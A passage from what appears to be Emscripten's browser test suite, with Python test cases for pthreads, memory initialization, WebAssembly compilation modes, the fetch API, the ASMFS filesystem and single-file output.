self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test thread-specific data (TLS).
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread condition variable creation and waiting.
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthreads are able to do printf.
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the main thread is able to use pthread_set/getspecific.
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '--shell-file', 'html.html'], timeout=30, also_wasm=False)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-g', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2', '--shell-file', 'html.html'], timeout=30, also_wasm=False)
  # Test that pthreads have access to the filesystem.
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args, timeout=30)
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'], timeout=30)
def test_pthread_custom_pthread_main_url(self):
self.clear()
    os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.pthreadMainPrefixURL" string to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { pthreadMainPrefixURL: "cdn/", '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html']).communicate()
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html']).communicate()
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
  # Test that when the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), the result is not a deadlock.
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that sbrk() operates properly in multithreaded conditions
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'], timeout=30)
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts, timeout=30)
# Test that the proxying operations of user code from pthreads to main thread work
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test how a lot of back-to-back called proxying operations behave.
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]:
for args in [[], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args+mem_init_mode+['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_wasm=False)
# test atomicrmw i64
def test_atomicrmw_i64(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html']).communicate()
self.run_browser('test.html', None, '/report_result?0')
  # Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
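  # Test MEM_INIT_METHOD=2 with a memory initializer that contains every possible byte pair.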
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1"]
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)]*256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1"]
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
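  # Test --separate-asm and tools/separate_asm.py: the asm.js module is split into its own file, which must be present for the page to run.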
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.html'] + opts).communicate()
self.run_browser('test.html', None, '/report_result?0')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
Popen([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js']).communicate()
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
self.clear()
      assert not os.path.exists('test.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
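  # Test EMTERPRETIFY_FILE: the emterpreter bytecode is emitted to code.dat and supplied to the runtime via Module.emterpreterFile.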
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
    try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
    try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
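  # Test that a plain <script src="test.js"> HTML page works when building with --proxy-to-worker.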
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o)]
print('plain html')
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_split_memory_large_file(self):
size = 2*1024*1024
open('huge.dat', 'w').write(''.join([chr((x*x)&255) for x in range(size*2)])) # larger than a memory chunk
self.btest('split_memory_large_file.cpp', expected='1', args=['-s', 'SPLIT_MEMORY=' + str(size), '-s', 'TOTAL_MEMORY=128MB', '-s', 'TOTAL_STACK=10240', '--preload-file', 'huge.dat'], timeout=60)
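  # Basic wasm smoke test using BINARYEN with the interpret-binary method.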
def test_binaryen(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
def test_binaryen_native(self):
for opts in [
[],
['-O1'],
['-O2'],
['-O3'],
['-Os'],
['-Oz'],
['-O2', '--js-opts', '1'],
['-O2', '-s', 'EMTERPRETIFY=1'],
['-O2', '-s', 'ALLOW_MEMORY_GROWTH=1'],
['-O2', '-s', 'EMTERPRETIFY=1', '-s', 'ALLOW_MEMORY_GROWTH=1'],
['-O2', '-s', 'OUTLINING_LIMIT=1000'],
['-O2', '--closure', '1'],
]:
print(opts)
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1'] + opts)
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
Module.printErr = function(x) {
Module.print('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
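# The shell above wraps WebAssembly.instantiate/instantiateStreaming so the page can
# record whether compilation actually went through the async path; the expected values
# below encode when async compilation should (or should not) kick in.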
shell_with_script('shell.html', 'shell.html', script)
common_args = ['-s', 'WASM=1', '--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'BINARYEN_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'BINARYEN_ASYNC_COMPILATION=0'], 0), # force it off
(['-s', 'BINARYEN_ASYNC_COMPILATION=1', '-s', 'BINARYEN_METHOD="native-wasm,asmjs"'], 0), # try to force it on, but have it disabled
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), os.path.join(self.get_dir(), 'manual_wasm_instantiate.html'))
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define a "Module.locateFile(foo)" function to control where test.wasm will be loaded from.
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open('shell2.html', 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
subprocess.check_call([PYTHON, EMCC, 'src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args+['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests the feature that the shell html page can preallocate the typed array and place it in Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/cached_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'])
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
f = open('largefile.txt', 'w')
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
for i in range(1024):
f.write(s)
f.close()
self.btest('fetch/stream_file.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'])
# Tests emscripten_fetch() usage in synchronous mode.
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'hello_file.txt'))
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl-open/src.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Tests the absolute minimum pthread-enabled application.
def test_hello_thread(self):
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
def test_load_js_from_blob_with_pthreads(self):
src = os.path.join(self.get_dir(), 'src.c')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
Popen([PYTHON, EMCC, 'src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js']).communicate()
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), os.path.join(self.get_dir(), 'hello_thread_with_blob_url.html'))
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='interpret-binary'"]
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"], also_proxied=True)
assert os.path.exists('test.html') and not os.path.exists('test.js') and not os.path.exists('test.worker.js')
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = [PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
run_process(args)
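# Under SINGLE_FILE all assets are inlined into test.js, so locateFile should never be
# asked to resolve a data: URI; the shell below throws if it ever is.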
open('test.html', 'w').write('''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"]).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
